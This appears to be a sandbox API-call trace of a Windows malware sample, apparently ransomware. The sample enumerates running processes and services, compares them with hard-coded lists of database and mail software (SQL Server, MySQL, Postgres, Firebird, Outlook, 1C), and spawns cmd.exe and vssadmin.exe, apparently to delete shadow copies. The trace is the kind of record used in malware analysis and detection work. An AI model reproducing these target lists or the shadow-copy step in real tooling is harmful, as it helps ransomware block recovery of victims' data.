	[0040.720] Process32FirstW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0040.721] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0040.721] lstrlenW (lpString="System") returned 6
	[0040.721] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0040.721] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0040.721] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0040.721] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0040.721] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0040.721] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0040.721] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0040.721] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0040.722] lstrlenW (lpString="smss.exe") returned 8
	[0040.722] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0040.722] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0040.722] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0040.722] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0040.722] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0040.722] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0040.722] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0040.722] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0040.723] lstrlenW (lpString="csrss.exe") returned 9
	[0040.723] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0040.723] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0040.723] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0040.723] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0040.723] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0040.723] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0040.723] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0040.723] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0040.723] lstrlenW (lpString="wininit.exe") returned 11
	[0040.723] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0040.723] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0040.723] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0040.723] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0040.723] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0040.723] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0040.723] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0040.723] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0040.724] lstrlenW (lpString="csrss.exe") returned 9
	[0040.724] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0040.724] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0040.724] lstrlenW (lpString="winlogon.exe") returned 12
	[0040.724] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0040.725] lstrlenW (lpString="services.exe") returned 12
	[0040.725] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0040.725] lstrlenW (lpString="lsass.exe") returned 9
	[0040.725] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0040.726] lstrlenW (lpString="lsm.exe") returned 7
	[0040.726] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0040.726] lstrlenW (lpString="svchost.exe") returned 11
	[0040.726] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0040.727] lstrlenW (lpString="svchost.exe") returned 11
	[0040.727] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0040.727] lstrlenW (lpString="svchost.exe") returned 11
	[0040.727] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0040.728] lstrlenW (lpString="svchost.exe") returned 11
	[0040.728] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0040.728] lstrlenW (lpString="svchost.exe") returned 11
	[0040.728] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0040.729] lstrlenW (lpString="audiodg.exe") returned 11
	[0040.729] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0040.729] lstrlenW (lpString="svchost.exe") returned 11
	[0040.729] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0040.730] lstrlenW (lpString="svchost.exe") returned 11
	[0040.730] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0040.730] lstrlenW (lpString="dwm.exe") returned 7
	[0040.730] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0040.731] lstrlenW (lpString="explorer.exe") returned 12
	[0040.731] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0040.731] lstrlenW (lpString="spoolsv.exe") returned 11
	[0040.731] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0040.732] lstrlenW (lpString="taskhost.exe") returned 12
	[0040.732] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0040.732] lstrlenW (lpString="svchost.exe") returned 11
	[0040.732] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0040.732] lstrlenW (lpString="taskeng.exe") returned 11
	[0040.733] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0040.733] lstrlenW (lpString="taskhost.exe") returned 12
	[0040.733] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0040.733] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0040.733] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0040.734] lstrlenW (lpString="python tragedy.exe") returned 18
	[0040.734] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0040.734] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0040.734] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0040.735] lstrlenW (lpString="computers.exe") returned 13
	[0040.735] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0040.735] lstrlenW (lpString="separated.exe") returned 13
	[0040.735] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0040.736] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0040.736] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0040.736] lstrlenW (lpString="darkness.exe") returned 12
	[0040.736] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0040.737] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0040.737] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0040.737] lstrlenW (lpString="sophisticated.exe") returned 17
	[0040.737] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0040.738] lstrlenW (lpString="wishlist.exe") returned 12
	[0040.738] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0040.738] lstrlenW (lpString="top.exe") returned 7
	[0040.738] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0040.739] lstrlenW (lpString="implemented.exe") returned 15
	[0040.739] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0040.739] lstrlenW (lpString="comp.exe") returned 8
	[0040.739] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0040.740] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0040.740] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0040.740] lstrlenW (lpString="solved.exe") returned 10
	[0040.740] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0040.741] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0040.741] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0040.741] lstrlenW (lpString="trips.exe") returned 9
	[0040.741] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0040.741] lstrlenW (lpString="tumormanual.exe") returned 15
	[0040.742] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0040.742] lstrlenW (lpString="telecom.exe") returned 11
	[0040.742] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0040.742] lstrlenW (lpString="realistic.exe") returned 13
	[0040.742] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0040.743] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0040.743] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0040.992] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0040.992] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0040.993] lstrlenW (lpString="cmd.exe") returned 7
	[0040.993] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0040.993] lstrlenW (lpString="conhost.exe") returned 11
	[0040.993] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0040.994] lstrlenW (lpString="vssadmin.exe") returned 12
	[0040.994] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1
	[0040.994] lstrlenW (lpString="VSSVC.exe") returned 9
	[0040.994] Process32NextW (in: hSnapshot=0x1f4, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0
	[0040.995] CloseHandle (hObject=0x1f4) returned 1
	[0040.995] Sleep (dwMilliseconds=0x1f4) 
	[0041.924] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7e0fc20
	[0041.924] EnumServicesStatusExW (in: hSCManager=0x7e0fc20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0041.925] GetLastError () returned 0xea
	[0041.925] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x123e) returned 0x7e5ca88
	[0041.925] EnumServicesStatusExW (in: hSCManager=0x7e0fc20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7e5ca88, cbBufSize=0x123e, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7e5ca88, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0041.927] CloseServiceHandle (hSCObject=0x7e0fc20) returned 1
	[0041.928] lstrlenW (lpString="Appinfo") returned 7
	[0041.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0041.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0041.928] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0041.928] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0041.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0041.928] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0041.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0041.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0041.928] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0041.928] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0041.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0041.928] lstrlenW (lpString="AudioSrv") returned 8
	[0041.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0041.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0041.928] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0041.928] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0041.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0041.928] lstrlenW (lpString="BFE") returned 3
	[0041.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0041.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0041.928] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0041.928] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0041.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0041.928] lstrlenW (lpString="CryptSvc") returned 8
	[0041.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0041.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0041.928] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0041.928] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0041.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0041.929] lstrlenW (lpString="CscService") returned 10
	[0041.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0041.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0041.929] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0041.929] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0041.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0041.929] lstrlenW (lpString="DcomLaunch") returned 10
	[0041.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0041.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0041.929] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0041.929] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0041.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0041.929] lstrlenW (lpString="Dhcp") returned 4
	[0041.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0041.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
